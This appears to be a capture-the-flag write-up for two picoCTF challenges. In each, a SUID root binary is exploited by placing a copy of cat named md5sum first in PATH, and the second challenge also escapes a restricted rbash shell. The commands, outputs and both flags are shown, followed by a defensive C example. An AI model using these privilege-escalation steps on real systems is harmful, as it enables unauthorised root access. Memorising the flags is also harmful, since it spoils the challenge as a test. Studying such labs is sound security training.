pwn - hash only 12
Here is a binary that has enough privilege to read the content of the flag file but will only let you know its hash. If only it could just give you the actual content!
November 4, 2025 • September 9, 2025 • Medium
hash-only-1 (Medium)
ctf-player@pico-chall$ ls -la
total 24
drwxr-xr-x 1 ctf-player ctf-player 20 Sep 10 02:27 .
drwxr-xr-x 1 root root 24 Aug 21 19:35 ..
drwx------ 2 ctf-player ctf-player 34 Sep 10 02:27 .cache
-rw-r--r-- 1 root root 67 Aug 21 19:35 .profile
-rwsr-xr-x 1 root root 18312 Aug 21 19:35 flaghasher
The flaghasher binary has the SUID permission bit set, so anyone can execute it with root privileges.
ctf-player@pico-chall$ ./flaghasher
Computing the MD5 hash of /root/flag.txt....
e86d7700e5500bcb26bf2140b8af5b96 /root/flag.txt
We see that flaghasher prints the MD5 hash of the flag, so let's check whether the md5sum binary is called with an absolute path.
ctf-player@pico-chall$ strings flaghasher | grep md5
/bin/bash -c 'md5sum /root/flag.txt'
There is no absolute path. So we can hijack this md5sum binary with a cat binary to print the flag:
ctf-player@pico-chall$ cp `which cat` md5sum
ctf-player@pico-chall$ ls -la
total 68
drwxr-xr-x 1 ctf-player ctf-player 34 Sep 10 02:30 .
drwxr-xr-x 1 root root 24 Aug 21 19:35 ..
drwx------ 2 ctf-player ctf-player 34 Sep 10 02:27 .cache
-rw-r--r-- 1 root root 67 Aug 21 19:35 .profile
-rwsr-xr-x 1 root root 18312 Aug 21 19:35 flaghasher
-rwxr-xr-x 1 ctf-player ctf-player 43416 Sep 10 02:30 md5sum
ctf-player@pico-chall$ export PATH=$PWD:$PATH
ctf-player@pico-chall$ echo $PATH
/home/ctf-player:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
ctf-player@pico-chall$ ./flaghasher
Computing the MD5 hash of /root/flag.txt....
picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_07e85021}
hash-only-2 (Medium)
ctf-player@pico-chall$ ls -la
total 4
drwxr-xr-x 1 ctf-player ctf-player 20 Sep 10 02:33 .
drwxr-xr-x 1 root root 24 Aug 21 19:28 ..
drwx------ 2 ctf-player ctf-player 34 Sep 10 02:33 .cache
-rw-r--r-- 1 root root 67 Aug 21 19:28 .profile
ctf-player@pico-chall$ cd ..
-rbash: cd: restricted
We are restricted by the current shell, which is rbash.
ctf-player@pico-chall$ echo $SHELL
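/bin/rbash
To get out of rbash we just need to start a regular bash. rbash rejects /bin/bash because command names may not contain `/', but the bare name bash works: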
ctf-player@pico-chall$ /bin/bash
-rbash: /bin/bash: restricted: cannot specify `/' in command names
ctf-player@pico-chall$ bash
ctf-player@challenge:~$ cd ..
ctf-player@challenge:/home$ ls -la
total 0
drwxr-xr-x 1 root root 24 Aug 21 19:28 .
drwxr-xr-x 1 root root 40 Sep 10 02:32 ..
drwxr-xr-x 1 ctf-player ctf-player 41 Sep 10 02:36 ctf-player
The rest is the same as hash-only-1:
ctf-player@challenge:/$ flaghasher
Computing the MD5 hash of /root/flag.txt....
dd1c78f3ca6c3f58c30ce73799a75369 /root/flag.txt
ctf-player@challenge:/$ which flaghasher
/usr/local/bin/flaghasher
ctf-player@challenge:/$ strings /usr/local/bin/flaghasher | grep md5
/bin/bash -c 'md5sum /root/flag.txt'
ctf-player@challenge:/$ cd ~
ctf-player@challenge:~$ cp `which cat` md5sum
ctf-player@challenge:~$ export PATH=$PWD:$PATH
ctf-player@challenge:~$ flaghasher
Computing the MD5 hash of /root/flag.txt....
picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_f3fcc367}
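
Both challenges work because flaghasher, running as root, launches md5sum by bare name through /bin/bash, so the caller's PATH decides which program runs. The following is an added example (not flaghasher's source and not code from the challenge authors) of how a setuid helper could run the hashing tool without a shell, by absolute path and with a fixed environment. The names run_clean and hash_file and the /usr/bin/md5sum location are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child: nothing is inherited from the caller. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Run prog (absolute path only) without a shell; capture stdout. -1 on error. */
int run_clean(const char *prog, char *const argv[], char *out, size_t outsz)
{
    int fds[2];
    if (prog[0] != '/' || outsz == 0 || pipe(fds) != 0)
        return -1;                      /* bare names would need a PATH lookup */
    pid_t pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {                     /* child: stdout -> pipe */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execve(prog, argv, CLEAN_ENV);  /* execve never searches PATH */
        _exit(127);
    }
    close(fds[1]);
    size_t used = 0;
    ssize_t n;
    while (used < outsz - 1 && (n = read(fds[0], out + used, outsz - 1 - used)) > 0)
        used += (size_t)n;
    out[used] = '\0';
    close(fds[0]);
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Hypothetical replacement for system("md5sum /root/flag.txt"); path is assumed. */
int hash_file(const char *path, char *out, size_t outsz)
{
    char *const argv[] = { "md5sum", "--", (char *)path, NULL };
    return run_clean("/usr/bin/md5sum", argv, out, outsz);
}

int main(int argc, char **argv)
{
    char buf[256];
    if (argc != 2 || hash_file(argv[1], buf, sizeof buf) != 0) return 1;
    return fputs(buf, stdout) == EOF;
}
```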